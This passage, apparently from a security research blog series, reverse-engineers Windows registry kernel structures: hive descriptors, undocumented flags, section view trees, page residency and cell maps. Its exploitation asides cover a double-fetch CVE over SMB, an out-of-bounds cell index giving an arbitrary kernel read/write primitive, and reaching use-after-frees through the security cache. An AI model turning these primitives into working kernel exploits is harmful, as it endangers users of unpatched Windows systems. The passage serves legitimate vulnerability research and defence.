+0x0b4MinimumLogSequence:Uint4B
+0x0b8LogFileSizeCap:Uint4B
+0x0bcLogDataPresent:[2]UChar
+0x0bePrimaryFileValid:UChar
+0x0bfBaseBlockDirty:UChar
+0x0c0LastLogSwapTime:_LARGE_INTEGER
+0x0c8FirstLogFile:Pos0,3Bits
+0x0c8SecondLogFile:Pos3,3Bits
+0x0c8HeaderRecovered:Pos6,1Bit
+0x0c8LegacyRecoveryIndicated:Pos7,1Bit
+0x0c8RecoveryInformationReserved:Pos8,8Bits
+0x0c8RecoveryInformation:Uint2B
+0x0caLogEntriesRecovered:[2]UChar
+0x0ccRefreshCount:Uint4B
+0x0d0StorageTypeCount:Uint4B
+0x0d4Version:Uint4B
+0x0d8ViewMap:_HVP_VIEW_MAP
+0x110Storage:[2]_DUAL
Signature
Equal to 0xBEE0BEE0, it is a unique signature of the _HHIVE / _CMHIVE structures. It may be useful in digital forensics for identifying these structures in raw memory dumps, and is yet another reference to bees in the Windows registry implementation.
Function pointers
Next up, there are six function pointers, initialized in HvHiveStartFileBacked and HvHiveStartMemoryBacked, and pointing at internal kernel handlers for the following operations:
Pointer name
Pointer value
Operation
GetCellRoutine
HvpGetCellPaged or HvpGetCellFlat
Translate cell index to virtual address
ReleaseCellRoutine
HvpReleaseCellPaged or HvpReleaseCellFlat
Release previously translated cell index
Allocate
CmpAllocate
Allocate kernel memory within global registry quota
Free
CmpFree
Free kernel memory within global registry quota
FileWrite
CmpFileWrite
Write data to hive file
FileRead
CmpFileRead
Read data from hive file
As we can see, these functions provide the basic functionality of operating on kernel memory, cell indexes, and the hive file. In my opinion, the most important of them is GetCellRoutine, whose typical destination, HvpGetCellPaged, performs the cell map walk in order to translate a cell index into the corresponding address within the hive mapping.
It is natural to think that these function pointers could prove useful for exploitation if an attacker managed to corrupt them through a buffer overflow or a use-after-free condition. That was indeed the case in Windows 10 and earlier, but in Windows 11, these calls are now de-virtualized, and most call sites reference one of HvpGetCellPaged / HvpGetCellFlat and HvpReleaseCellPaged / HvpReleaseCellFlat directly, without referring to the pointers. This is great for security, as it completely eliminates the usefulness of those fields in any offensive scenarios.
Here's an example of a GetCellRoutine call in Windows 10, disassembled in IDA Pro:
And the same call in Windows 11:
Hive load failure information
This is a pointer to a public _HIVE_LOAD_FAILURE structure, which is passed as the first argument to the SetFailureLocation function every time an error occurs while loading a hive. It can be helpful in tracking which validity checks have failed for a given hive, without having to trace the entire loading process.
Base block
A pointer to a copy of the hive header, represented by the _HBASE_BLOCK structure.
Synchronization locks
There are two locks with the following purpose:
FlusherLock – synchronizes access to the hive between clients changing data inside cells and the flusher thread;
WriterLock – synchronizes access to the hive between writers that modify the bin/cell layout.
They are officially of type _CMSI_RW_LOCK, but they boil down to _EX_PUSH_LOCK, and they are used with standard kernel APIs such as ExAcquirePushLockSharedEx.
Dirty blocks information
Between offsets 0x58 and 0x84, _HHIVE stores several data structures representing the state of synchronization between the in-memory and on-disk instances of the hive.
Hive flags
First of all, there are two flags at offset 0x8C that indicate if the hive mapping is flat and if the hive is read-only. Secondly, there is a 32-bit HiveFlags member that stores further flags which aren't (as far as I know) included in any public Windows symbols. I have managed to reverse-engineer and infer the meaning of the constants I have observed, resulting in the following enum:
enum_HV_HIVE_FLAGS
{
HIVE_VOLATILE=0x1,
HIVE_NOLAZYFLUSH=0x2,
HIVE_PRELOADED=0x10,
HIVE_IS_UNLOADING=0x20,
HIVE_COMPLETE_UNLOAD_STARTED=0x40,
HIVE_ALL_REFS_DROPPED=0x80,
HIVE_ON_PRELOADED_LIST=0x400,
HIVE_FILE_READ_ONLY=0x8000,
HIVE_SECTION_BACKED=0x20000,
HIVE_DIFFERENCING=0x80000,
HIVE_IMMUTABLE=0x100000,
HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL=0x800000,
};
Below is a one-liner explanation of each flag:
HIVE_VOLATILE: the hive exists in memory only; set, e.g., for \Registry and \Registry\Machine\HARDWARE.
HIVE_NOLAZYFLUSH: changes to the hive aren't automatically flushed to disk and require a manual flush; set, e.g., for \Registry\Machine\SAM.
HIVE_PRELOADED: the hive is one of the default, system ones; set, e.g., for \Registry\Machine\SOFTWARE, \Registry\Machine\SYSTEM, etc.
HIVE_IS_UNLOADING: the hive is currently being loaded or unloaded in another thread and shouldn't be accessed before the operation is complete.
HIVE_COMPLETE_UNLOAD_STARTED: the unloading process of the hive has started in CmpCompleteUnloadKey.
HIVE_ALL_REFS_DROPPED: all references to the hive through KCBs have been dropped.
HIVE_ON_PRELOADED_LIST: the hive is linked into a linked-list via the PreloadedHiveList field.
HIVE_FILE_READ_ONLY: the underlying hive file is read-only and shouldn't be modified; indicates that the hive was loaded with the REG_OPEN_READ_ONLY flag set.
HIVE_SECTION_BACKED: the hive is mapped in memory using section views.
HIVE_DIFFERENCING: the hive is a differencing one (version 1.6, loaded under \Registry\WC).
HIVE_IMMUTABLE: the hive is immutable and cannot be modified; indicates that it was loaded with the REG_IMMUTABLE flag set.
HIVE_FILE_PAGES_MUST_BE_KEPT_LOCAL: the kernel always maintains a local copy of every page of the hive, either by locking it in physical memory or creating a private copy through the CoW mechanism.
Log file information
Between offsets 0xA4 to 0xCC, there are a number of fields having to do with log file management, i.e. the .LOG1/.LOG2 files accompanying the main hive file on disk.
Hive version
The Version field stores the minor version of the hive, which should theoretically be an integer between 3–6. However, as mentioned in the previous blog post, it is possible to set it to an arbitrary 32-bit value either by specifying a major version equal to 0 and any desired minor version, or by enticing the kernel to recover the hive header from a log file, and abusing the fact that the HvAnalyzeLogFiles function is more permissive than HvpGetHiveHeader. Nevertheless, I haven't found any security implications of this behavior.
View map
The view map holds all the essential information about how the hive is mapped in memory. The specific implementation of registry memory management has evolved considerably over the years, with its details changing between consecutive system versions. In the latest ones, the view map is represented by the top-level _HVP_VIEW_MAP public structure:
0:kd>dt_HVP_VIEW_MAP
nt!_HVP_VIEW_MAP
+0x000SectionReference:Ptr64Void
+0x008StorageEndFileOffset:Int8B
+0x010SectionEndFileOffset:Int8B
+0x018ProcessTuple:Ptr64_CMSI_PROCESS_TUPLE
+0x020Flags:Uint4B
+0x028ViewTree:_RTL_RB_TREE
The semantics of its respective fields are as follows:
SectionReference: Contains a kernel-mode handle to a section object corresponding to the hive file, created via ZwCreateSection in CmSiCreateSectionForFile.
StorageEndFileOffset: Stores the maximum size of the hive that can be represented with file-backed sections at any given time. Initially set to the size of the loaded hive, it can dynamically increase or decrease at runtime for mutable (normal) hives.
SectionEndFileOffset: Represents the size of the hive file section at the time of loading. It is never modified past the first initialization in HvpViewMapStart, and seems to be mostly used as a safeguard against extending an immutable hive file beyond its original size.
ProcessTuple: A structure of type _CMSI_PROCESS_TUPLE, it identifies the host process of the hive's section views. This field currently always points to the global CmpRegistryProcess object, which corresponds to the dedicated "Registry" process that hosts all hive mappings in the system. However, this field could enable a more fine-grained separation of hive mappings across multiple processes, should Microsoft choose to implement such a feature.
Flags: Represents a set of memory management flags relevant to the entire hive. These flags are not publicly documented; however, through reverse engineering, I have determined their purpose to be as follows:
VIEW_MAP_HIVE_FILE_IMMUTABLE (0x1): Indicates that the hive has been loaded as immutable, meaning no data is ever saved back to the underlying hive file.
VIEW_MAP_MUST_BE_KEPT_LOCAL (0x2): Indicates that all of the hive data must be persistently stored in memory, and not just accessible through file-backed sections. This is likely to protect against double-fetch conditions involving hives loaded from remote network shares.
VIEW_MAP_CONTAINS_LOCKED_PAGES (0x4): Indicates that some of the hive's pages are currently locked in physical memory using ZwLockVirtualMemory.
ViewTree: This is the root of a view tree structure, which contains the descriptors of each continuous section view mapped in memory.
Overall, the implementation of low-level hive memory management in Windows is more complex than might initially seem necessary. This complexity arises from the kernel's need to gracefully handle a variety of corner cases and interactions. For example, hives may be loaded as immutable, which indicates that the hive may be operated on in memory, but changes must not be flushed to disk. Simultaneously, the system must support recovering data from .LOG files, including the possibility of extending the hive beyond its original on-disk length. At runtime, it must also be possible to efficiently modify the registry data, as well as shrink and extend it on demand. To further complicate matters, Windows enforces different rules for locking hive pages in memory depending on the backing volume of the file, carefully balancing optimal memory usage and system security guarantees. These and many other factors collectively contribute to the complexity of hive memory management.
To better understand how the view tree is organized, let's first analyze the general logic of the hive mapping code.
The hive mapping logic
The main kernel function responsible for mapping a hive in memory is HvLoadHive. It implements the overall logic and coordinates various sub-routines responsible for performing more specialized tasks, in the following order:
Header Validation: The kernel reads and inspects the hive's header to ascertain its integrity, ensuring that the hive has not been tampered with or corrupted. Relevant function: HvpGetHiveHeader.
Log Analysis: The kernel processes the hive's transaction logs, scrutinising them to identify any pending changes or inconsistencies that necessitate recovery procedures. Relevant function: HvAnalyzeLogFiles.
Initial Section Mapping: A section object is created based on the hive file, and further segmented into multiple views, each aligned to 4 KiB boundaries and capped at 2 MiB. At this point, the kernel prioritizes the creation of an initial mapping without focusing on the granular layout of individual bins within the hive. Relevant function: HvpViewMapStart.
Cell Map Initialization: The cell map, a component that translates cell indexes to memory address, is initialized. Its entries are configured to point to the newly created views. Relevant function: HvpMapHiveImageFromViewMap.
Log Recovery (if required): If the preceding log analysis reveals the need for data recovery, the kernel attempts to restore data integrity. This is the earliest point at which the newly created memory mappings may already be modified and marked as "dirty", indicating that their contents have been altered and require synchronisation with the on-disk representation. Relevant function: HvpPerformLogFileRecovery.
Bin Mapping: In this final stage, the kernel establishes definitive memory mappings for each bin within the hive, ensuring that each bin occupies a contiguous region of memory. This process may necessitate creating new views, eliminating existing ones, or adjusting their boundaries to accommodate the specific arrangement of bins. Relevant function: HvpRemapAndEnlistHiveBins.
Now that we understand the primary components of the loading process, we can examine the internal structure of the section view tree in more detail.
The view tree
Let's consider an example hive consisting of three bins of sizes 256 KiB, 2 MiB and 128 KiB, respectively. After step 3 ("Initial Section Mapping"), the section views created by the kernel are as follows:
As we can see, at this point, the kernel doesn't concern itself with bin boundaries or continuity: all it needs to achieve is to make every page of the hive accessible through a section view for log recovery purposes. In simple terms, the way that HvpViewMapStart (or more specifically, HvpViewMapCreateViewsForRegion) works is it creates as many 2 MiB views as necessary, followed by one last view that covers the remaining part of the file. So in our example, we have the first view that covers bin 1 and the beginning of bin 2, and the second view that covers the trailing part of bin 2 and the entire bin 3. It's important to note that memory continuity is only guaranteed within the scope of a single view, and views 1 and 2 may be mapped at completely different locations in the virtual address space.
Later in step 6, the system ensures that every bin is mapped as a contiguous block of memory before handing off the hive to the client. This is done by iterating through all the bins, and for every bin that spans more than one view in the current view map, the following operations are performed:
If the start and/or the end of the bin fall into the middle of existing views, these views are truncated from either side. Furthermore, if there are any views that are fully covered by the bin, they are freed and removed from the tree.
A new, dedicated section view is created for the bin and inserted into the view tree.
In our hypothetical scenario, the resulting view layout would be as follows:
As we can see, the kernel shrinks views 1 and 2, and creates a new view 3 corresponding to bin 2 to fill the gap. The final layout of the binary tree of section view descriptors is illustrated below:
Knowing this, we can finally examine the structure of a single view tree entry. It is not included in the public symbols, but I named it _HVP_VIEW. My reverse-engineered version of its definition is as follows:
struct_HVP_VIEW
{
RTL_BALANCED_NODENode;
LARGE_INTEGERViewStartOffset;
LARGE_INTEGERViewEndOffset;
SSIZE_TValidStartOffset;
SSIZE_TValidEndOffset;
PBYTEMappingAddress;
SIZE_TLockedPageCount;
_HVP_VIEW_PAGE_FLAGSPageFlags[];
};
The role of each particular field is documented below:
Node: This is the structure used to link all of the entries into a single red-black tree, passed to helper kernel functions such as RtlRbInsertNodeEx and RtlRbRemoveNode.
ViewStartOffset and ViewEndOffset: This offset pair specifies the overall byte range covered by the underlying section view object in the hive file. Their difference corresponds to the cumulative length of the red and green boxes in a single row in the diagrams above.
ValidStartOffset and ValidEndOffset: This offset pair specifies the valid range of the hive accessible through this view, i.e. the green rectangles in the diagrams. It must always be a subset of the [ViewStartOffset, ViewEndOffset] range, and may dynamically change while re-mapping bins (as just shown in this section), as well as when shrinking and extending the hive.
MappingAddress: This is the base address of the section view mapping in memory, as returned by ZwMapViewOfSection. It is valid in the context of the process specified by _HVP_VIEW_MAP.ProcessTuple (currently always the "Registry" process). It covers the entire range between [ViewStartOffset, ViewEndOffset], but only pages between [ValidStartOffset, ValidEndOffset] are accessible, and the rest of the section view is marked as PAGE_NOACCESS.
LockedPageCount: Specifies the number of pages locked in virtual memory using ZwLockVirtualMemory within this view.
PageFlags: A variable-length array that specifies a set of flags for each memory page in the [ViewStartOffset, ViewEndOffset] range.
I haven't found any (un)official sources documenting the set of supported page flags, so below is my attempt to name them and explain their meaning:
Flag
Value
Description
VIEW_PAGE_VALID
0x1
Indicates if the page is valid – true for pages between [ValidStartOffset, ValidEndOffset], false otherwise. If this flag is clear, all other flags are irrelevant/unused.
The flag is set:
When creating section views during hive loading, first the initial ones in HvpViewMapStart, and then the bin-specific ones in HvpRemapAndEnlistHiveBins.
When extending an active hive in HvpViewMapExtendStorage.
The flag is cleared:
When trimming the existing views in HvpRemapAndEnlistHiveBins to make room for new ones.
When shrinking the hive in HvpViewMapShrinkStorage.
VIEW_PAGE_COW_BY_CALLER
0x2
Indicates if the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as initiated by a client action, e.g. a registry operation that modified data in a cell and thus resulted in marking the page as dirty.
The flag is set:
When dirtying a hive cell, in HvpViewMapMakeViewRangeCOWByCaller.
The flag is cleared:
When flushing the registry changes to disk, in HvpViewMapMakeViewRangeUnCOWByCaller.
VIEW_PAGE_COW_BY_POLICY
0x4
Indicates if the kernel maintains a copy of the page through the copy-on-write (CoW) mechanism, as required by the policy that all pages of non-local hives (hives loaded from volumes other than the system volume) must always remain in memory.
The flag is set:
In HvpViewMapMakeViewRangeValid, as an alternative way of keeping a local copy of the hive pages in memory (if locking fails, or the caller doesn't want the pages locked).
In HvpViewMapMakeViewRangeCOWByCaller, when converting previously locked pages to the "CoW by policy" state.
In HvpMappedViewConvertRegionFromLockedToCOWByPolicy, when lazily converting previously locked pages to the "CoW by policy" state in a thread that runs every 60 seconds (as indicated by CmpLazyLocalizeIntervalInSeconds).
The flag is cleared:
In HvpViewMapMakeViewRangeUnCOWByPolicy, which currently only ever seems to happen for hives loaded from the system volume, i.e. "\SystemRoot" and "\OSDataRoot", as listed in the global CmpWellKnownVolumeList array.
VIEW_PAGE_WRITABLE
0x8
Indicates if the page is currently marked as writable, typically as a result of a modifying operation on the page that hasn't been yet flushed to disk.
The flag is set:
In HvpViewMapMakeViewRangeCOWByCaller, when marking a cell as dirty.
The flag is cleared:
In HvpViewMapMakeViewRangeUnCOWByCaller, when flushing the hive changes to disk.
In HvpViewMapSealRange, when setting the memory as read-only for miscellaneous reasons (after performing log file recovery, etc.).
VIEW_PAGE_LOCKED
0x10
Indicates if the page is currently locked in physical memory.
The flag is set:
In HvpViewMapMakeViewRangeValid if the caller requests page locking, and there is enough space left in the 64 MiB working set of the Registry process. In practice, this boils down to locking the initial 2 MiB hive mappings created in HvpViewMapStart for all app hives and for normal hives outside of the system disk volume.
The flag is cleared:
Whenever the state of the page changes to CoW-by-policy or Invalid in the following functions:
HvpViewMapMakeViewRangeCOWByCaller
HvpMappedViewConvertRegionFromLockedToCOWByPolicy
HvpViewMapMakeViewRangeUnCOWByPolicy
HvpViewMapMakeViewRangeInvalid
The semantics of most of the flags are straightforward, but perhaps VIEW_PAGE_COW_BY_POLICY and VIEW_PAGE_LOCKED warrant a slightly longer explanation. The two flags are mutually exclusive, and they represent nearly identical ways to achieve the same goal: ensure that a copy of each hive page remains resident in memory or a pagefile. Under normal circumstances, the kernel could simply create the necessary section views in their default form, and let the memory management subsystem decide how to handle their pages most efficiently. However, one of the guarantees of the registry is that once a hive has been loaded, it must remain operational for as long as it is active in the system. On the other hand, section views have the property that (parts of) their underlying data may be completely evicted by the kernel, and later re-read from the original storage medium such as the hard drive. So, it is possible to imagine a situation where:
A hive is loaded from a removable drive (e.g. a CD-ROM or flash drive) or a network share,
Due to high memory pressure from other applications, some of the hive pages are evicted from memory,
The removable drive with the hive file is ejected from the system,
A client subsequently tries to operate on the hive, but parts of it are unavailable and cannot be fetched again from the original source.
This could cause some significant problems and make the registry code fail in unexpected ways. It would also constitute a security vulnerability: the kernel assumes that once it has opened and sanitized the hive file, its contents remain consistent for as long as the hive is used. This is achieved by opening the file with exclusive access, but if the hive data was ever re-read by the Windows memory manager, a malicious removable drive or an attacker-controlled network share could ignore the exclusivity request and provide different, invalid data on the second read. This would result in a kind of "double fetch" condition and potentially lead to kernel memory corruption.
To address both the reliability and security concerns, Windows makes sure to never evict pages corresponding to hives for which exclusive access cannot be guaranteed. This covers hives loaded from a location other than the system volume, and since Windows 10 19H1, also all app hives regardless of the file location. The first way to achieve this is by locking the pages directly in physical memory with a ZwLockVirtualMemory call. It is used for the initial ≤ 2 MiB section views created while loading a hive, up to the working set limit of the Registry process currently set at 64 MiB. The second way is by taking advantage of the copy-on-write mechanism – that is, marking the relevant pages as PAGE_WRITECOPY and subsequently touching each of them using the HvpViewMapTouchPages helper function. This causes the memory manager to create a private copy of each memory page containing the same data as the original, thus preventing them from ever being unavailable for registry operations.
Between the two types of resident pages, the CoW type effectively becomes the default option in the long term. Eventually most pages converge to this state, even if they initially start as locked. This is because locked pages transition to CoW on multiple occasions, e.g. when converted by the background CmpDoLocalizeNextHive thread that runs every 60 seconds, or during the modification of a cell. On the other hand, once a page transitions to the CoW state, it never reverts to being locked. A diagram illustrating the transitions between the page residence states in a hive loaded from removable/remote storage is shown below:
For normal hives loaded from the system volume (i.e. without the VIEW_MAP_MUST_BE_KEPT_LOCAL flag set), the state machine is much simpler:
As a side note, CVE-2024-43452 was an interesting bug that exploited a flaw in the page residency protection logic.The bug arose because some data wasn't guaranteed to be resident in memory and could be fetched twice from a remote SMB share during bin mapping.This occurred early in the hive loading process, before page residency protections were fully in place.The kernel trusted the data from the second read without re-validation, allowing it to be maliciously set to invalid values, resulting in kernel memory corruption.
Cell maps
As discussed in Part 5, almost every cell contains references to other cells in the hive in the form of cell indexes. Consequently, virtually every registry operation involves multiple rounds of translating cell indexes into their corresponding virtual addresses in order to traverse the registry structure. Section views are stored in a red-black tree, so the search complexity is O(log n). This may seem decent, but if we consider that on a typical system, the registry is read much more often than it is extended/shrunk, it becomes apparent that it makes sense to further optimize the search operation at the cost of a less efficient insertion/deletion. And this is exactly what cell maps are: a way of trading a faster search complexity of O(1) for slower insertion/deletion complexity of O(n) instead of O(log n). Thanks to this technique, HvpGetCellPaged – perhaps the hottest function in the Windows registry implementation – executes in constant time.
In technical terms, cell maps are pagetable-like structures that divide the 32-bit hive address space into smaller, nested layers consisting of so-called directories, tables, and entries. As a reminder, the layout of cell indexes and cell maps is illustrated in the diagram below, based on a similar diagram in the Windows Internals book, which itself draws from Mark Russinovich's 1999 article, Inside the Registry:
Given the nature of the data structure, the corresponding cell map walk involves dereferencing three nested arrays based on the subsequent 1, 10 and 9-bit parts of the cell index, and then adding the final 12-bit offset to the page-aligned address of the target block. The internal kernel structures matching the respective layers of the cell map are _DUAL, _HMAP_DIRECTORY, _HMAP_TABLE and _HMAP_ENTRY, all publicly accessible via the ntoskrnl.exe PDB symbols. The entry point to the cell map is the Storage array at the end of the _HHIVE structure:
0:kd>dt_HHIVE
nt!_HHIVE
[...]
+0x118Storage:[2]_DUAL
The index into the two-element array represents the storage type, 0 for stable and 1 for volatile, so a single _DUAL structure describes a 2 GiB view of a specific storage space:
0:kd>dt_DUAL
nt!_DUAL
+0x000Length:Uint4B
+0x008Map:Ptr64_HMAP_DIRECTORY
+0x010SmallDir:Ptr64_HMAP_TABLE
+0x018Guard:Uint4B
+0x020FreeDisplay:[24]_FREE_DISPLAY
+0x260FreeBins:_LIST_ENTRY
+0x270FreeSummary:Uint4B
Let's examine the semantics of each field:
Length: Expresses the current length of the given storage space in bytes. Directly after loading the hive, the stable length is equal to the size of the hive on disk (including any data recovered from log files, minus the 4096 bytes of the header), and the volatile space is empty by definition. Only cell map entries within the [0, Length - 1] range are guaranteed to be valid.
Map: Points to the actual directory structure represented by _HMAP_DIRECTORY.
SmallDir: Part of the "small dir" optimization, discussed in the next section.
Guard: Its specific role is unclear, as the field is always initialized to 0xFFFFFFFF upon allocation and never used afterwards. I expect that it is some kind of debugging remnant from the early days of the registry development, presumably related to the small dir optimization.
FreeDisplay: A data structure used to optimize searches for free cells during the cell allocation process. It consists of 24 buckets, each corresponding to a specific cell size range and represented by the _FREE_DISPLAY structure, indicating which pages in the hive may potentially contain free cells of the given length.
FreeBins: The head of a doubly-linked list that links the descriptors of entirely empty bins in the hive, represented by the _FREE_HBIN structures.
FreeSummary: A bitmask indicating which buckets within FreeDisplay have any hints set for the given cell size. A zero bit at a given position means that there are no free cells of the specific size range anywhere in the hive.
The next level in the cell map hierarchy is the _HMAP_DIRECTORY structure:
0:kd>dt_HMAP_DIRECTORY
nt!_HMAP_DIRECTORY
+0x000Directory:[1024]Ptr64_HMAP_TABLE
As we can see, it is simply a 1024-element array of pointers to _HMAP_TABLE:
0:kd>dt_HMAP_TABLE
nt!_HMAP_TABLE
+0x000Table:[512]_HMAP_ENTRY
Further, we get a 512-element array of pointers to the final level of the cell map, _HMAP_ENTRY:
0:kd>dt_HMAP_ENTRY
nt!_HMAP_ENTRY
+0x000BlockOffset:Uint8B
+0x008PermanentBinAddress:Uint8B
+0x010MemAlloc:Uint4B
This last level contains a descriptor of a single page in the hive and warrants a deeper analysis. Let's start by noting that the four least significant bits of PermanentBinAddress correspond to a set of undocumented flags that control various aspects of the page behavior. I was able to reverse-engineer them and partially recover their names, largely thanks to the fact that some older Windows 10 builds contained non-inlined functions operating on these flags, with revealing names like HvpMapEntryIsDiscardable or HvpMapEntryIsTrimmed:
enum _MAP_ENTRY_FLAGS
{
MAP_ENTRY_NEW_ALLOC=0x1,
MAP_ENTRY_DISCARDABLE=0x2,
MAP_ENTRY_TRIMMED=0x4,
MAP_ENTRY_DUMMY=0x8,
};
Here's a brief summary of their meaning based on my understanding:
MAP_ENTRY_NEW_ALLOC: Indicates that this is the first page of a bin. Cell indexes pointing into this page must specify an offset within the range of [0x20, 0xFFF], as they cannot fall into the first 32 bytes that correspond to the _HBIN structure.
MAP_ENTRY_DISCARDABLE: Indicates that the whole bin is empty and consists of a single free cell.
MAP_ENTRY_TRIMMED: Indicates that the page has been marked as "trimmed" in HvTrimHive. More specifically, this property is related to hive reorganization, and is set during the loading process on some number of trailing pages that only contain keys accessed during boot, or not accessed at all since the last reorganization. The overarching goal is likely to prevent introducing unnecessary fragmentation in the hive by avoiding mixing together keys with different access histories.
MAP_ENTRY_DUMMY: Indicates that the page is allocated from the kernel pool and isn't part of a section view.
With this in mind, let's dive into the details of each _HMAP_ENTRY structure member:
PermanentBinAddress: The lower 4 bits contain the above flags. The upper 60 bits represent the base address of the bin mapping corresponding to this page.
BlockOffset: This field has a dual functionality. If the MAP_ENTRY_DISCARDABLE flag is set, it is a pointer to a descriptor of a free bin, _FREE_HBIN, linked into the _DUAL.FreeBins linked list. If it is clear (the typical case), it expresses the offset of the page relative to the start of the bin. Therefore, the virtual address of the block's data in memory can be calculated as (PermanentBinAddress & (~0xF)) + BlockOffset.
MemAlloc: If the MAP_ENTRY_NEW_ALLOC flag is set, it contains the size of the bin, otherwise it is zero.
And this concludes the description of how cell maps are structured. Taking all of it into account, the implementation of the HvpGetCellPaged function starts to make a lot of sense. Its pseudocode comes down to the following:
The same process is followed, for example, by the implementation of the WinDbg !reg cellindex extension, which also translates a pair of a hive pointer and a cell index into the virtual address of the cell.
The small dir optimization
There is one other implementation detail about the cell maps worth mentioning here – the small dir optimization. Let's start with the observation that a majority of registry hives in Windows are relatively small, below 2 MiB in size. This can be easily verified by using the !reg hivelist command in WinDbg, and taking note of the values in the "Stable Length" and "Volatile Length" columns. Most of them usually contain values between several kilobytes to hundreds of kilobytes. This would mean that if the kernel allocated the full first-level directory for these hives (taking up 1024 entries × 8 bytes = 8 KiB on 64-bit platforms), they would still only use the first element in it, leading to a non-trivial waste of memory – especially in the context of the early 1990's when the registry was first implemented. In order to optimize this common scenario, Windows developers employed an unconventional approach to simulate a 1-item long "array" with the SmallDir member of type _HMAP_TABLE in the _DUAL structure, and have the _DUAL.Map pointer point at it instead of a separate pool allocation when possible. Later, whenever the hive grows and requires more than one element of the cell map directory, the kernel falls back to the standard behavior and performs a normal pool allocation for the directory array.
A revised diagram illustrating the cell map layout of a small hive is shown below:
Here, we can see that indexes 1 through 1023 of the directory array are invalid. Instead of correctly initialized _HMAP_TABLE structures, they point into "random" data corresponding to other members of the _DUAL and the larger _CMHIVE structure that happen to be located after _DUAL.SmallDir. Ordinarily, this is merely a low-level detail that doesn't have any meaningful implications, as all actively loaded hives remain internally consistent and always contain cell indexes that remain within the bounds of the hive's storage space. However, if we look at it through the security lens of hive-based memory corruption, this behavior suddenly becomes very interesting. If an attacker was able to implant an out-of-bounds cell index with the directory index greater than 0 into a hive, they would be able to get the kernel to operate on invalid (but deterministic) data as part of the cell map walk, and enable a powerful arbitrary read/write primitive. In addition to the small dir optimization, this technique is also enabled by the fact that the HvpGetCellPaged routine doesn't perform any bounds checks of the cell indexes, instead blindly trusting that they are always valid.
If you are curious to learn more about the exploitation aspect of out-of-bounds cell indexes, it was the main subject of my Practical Exploitation of Registry Vulnerabilities in the Windows Kernel talk given at OffensiveCon 2024 (slides and video recording are available). I will also discuss it in more detail in one of the future blog posts focused specifically on the security impact of registry vulnerabilities.
_CMHIVE structure overview
Beyond the first member of type _HHIVE at offset 0, the _CMHIVE structure contains more than 3 KiB of further information describing an active hive. This data relates to concepts more abstract than memory management, such as the registry tree structure itself. Below, instead of a field-by-field analysis, we'll focus on the general categories of information within _CMHIVE, organized loosely by increasing complexity of the data structures:
Reference count: a 32-bit refcount primarily used during short-term operations on the hive, to prevent the object from being freed while actively operated on. These are used by the thin wrappers CmpReferenceHive and CmpDereferenceHive.
File handles and sizes: handles and current sizes of the hive files on disk, such as the main hive file (.DAT) and the accompanying log files (.LOG, .LOG1, .LOG2). The handles are stored in FileHandles array, and the sizes reside in ActualFileSize and LogFileSizes.
Text strings: some informational strings that may prove useful when trying to identify a hive based on its _CMHIVE structure. For example, the hive file name is stored in FileUserName, and the hive mount point path is stored in HiveRootPath.
Timestamps: there are several timestamps that can be found in the hive descriptor, such as DirtyTime, UnreconciledTime or LastWriteTime.
List entries: instances of the _LIST_ENTRY structure used to link the hive into various double-linked lists, such as the global list of hives in the system (HiveList, starting at nt!CmpHiveListHead), or the list of hives within a common trust class (TrustClassEntry).
Synchronization mechanisms: various objects used to synchronize access to the hive as a whole, or some of its parts. Examples include HiveRundown, SecurityLock and HandleClosePendingEvent.
Unload history: a 128-element array that stores the number of steps that have been successfully completed in the process of unloading the hive. Its specific purpose is unclear, it might be a debugging artifact retained from older versions of Windows.
Late unload state: objects related to deferred unloading of registry hives (LateUnloadWorkItemState, LateUnloadFinishedEvent, LateUnloadWorkItem).
Hive layout information: the hive reorganization process in Windows tries to optimize hives by grouping together keys accessed during system runtime, followed by keys accessed during system boot, followed by completely unused keys. If a hive is structured according to this order during load, the kernel saves information about the boundaries between the three distinct areas in the BootStart, UnaccessedStart and UnaccessedEnd members of _CMHIVE.
Flushing state and dirty block information: any state that has to do with marking cells as dirty and synchronizing their contents to disk. There are a significant number of fields related to the functionality, with names starting with "Flush...", "Unreconciled..." and "CapturedUnreconciled...".
Volume context: a pointer to a public _CMP_VOLUME_CONTEXT structure, which provides extended information about the disk volume of the hive file. As an example, it is used in the internal CmpVolumeContextMustHiveFilePagesBeKeptLocal routine to determine whether the volume is a system one, and consequently whether certain security/reliability assumptions are guaranteed for it or not.
KCB table and root KCB: a table of the globally visible KCB (Key Control Block) structures corresponding to keys in the hive, and a pointer to the root key's KCB. I will discuss KCBs in more detail in the "Key structures" section below.
Security descriptor cache: a cache of all security descriptors present in the hive, allocated from the kernel pool and thus accessible more efficiently than the underlying hive mappings. In my bug reports, I have often taken advantage of the security cache as a straightforward way to demonstrate the exploitability of security descriptor use-after-frees. A security node UAF can be easily converted into an UAF of its pool-based cached object, which then reliably triggers a Blue Screen of Death when Special Pool is enabled. The security cache of any given hive can be enumerated using the !reg seccache command in WinDbg.
Transaction-related objects: a pointer to a _CM_RM structure that describes the Resource Manager object associated with the hive, if "heavyweight" transactions (i.e. KTM transactions) are enabled for it.
Last but not least, _CMHIVE has its own Flags field that is different from _HHIVE.Flags. As usual, the flags are not documented, so the listing below is a product of my own analysis:
enum_CM_HIVE_FLAGS
{
CM_HIVE_UNTRUSTED=0x1,
CM_HIVE_IN_SID_MAPPING_TABLE=0x2,
CM_HIVE_HAS_RM=0x8,
CM_HIVE_IS_VIRTUALIZABLE=0x10,
CM_HIVE_APP_HIVE=0x20,
CM_HIVE_PROCESS_PRIVATE=0x40,
CM_HIVE_MUST_BE_REORGANIZED=0x400,
CM_HIVE_DIFFERENCING_WRITETHROUGH=0x2000,
CM_HIVE_CLOUDFILTER_PROTECTED=0x10000,
};
A brief description of each of them is as follows:
CM_HIVE_UNTRUSTED: the hive is "untrusted" in the sense of registry symbolic links; in other words, it is not one of the default system hives loaded on boot. The distinction is that trusted hives can freely link to all other hives in the system, while untrusted ones can only link to hives within their so-called trust class. This is to prevent confused deputy-style privilege escalation attacks in the system.
CM_HIVE_IN_SID_MAPPING_TABLE: the hive is linked into an internal data structure called the "SID mapping table" (nt!CmpSIDToHiveMapping), used to efficiently look up the user class hives mounted at \Registry\User\<SID>_Classes for the purposes of registry virtualization.
CM_HIVE_HAS_RM: KTM transactions are enabled for this hive, meaning that the corresponding .blf and .regtrans-ms files are present in the same directory as the main hive file. The flag is clear if the hive is an app hive or if it was loaded with the REG_HIVE_NO_RM flag set.
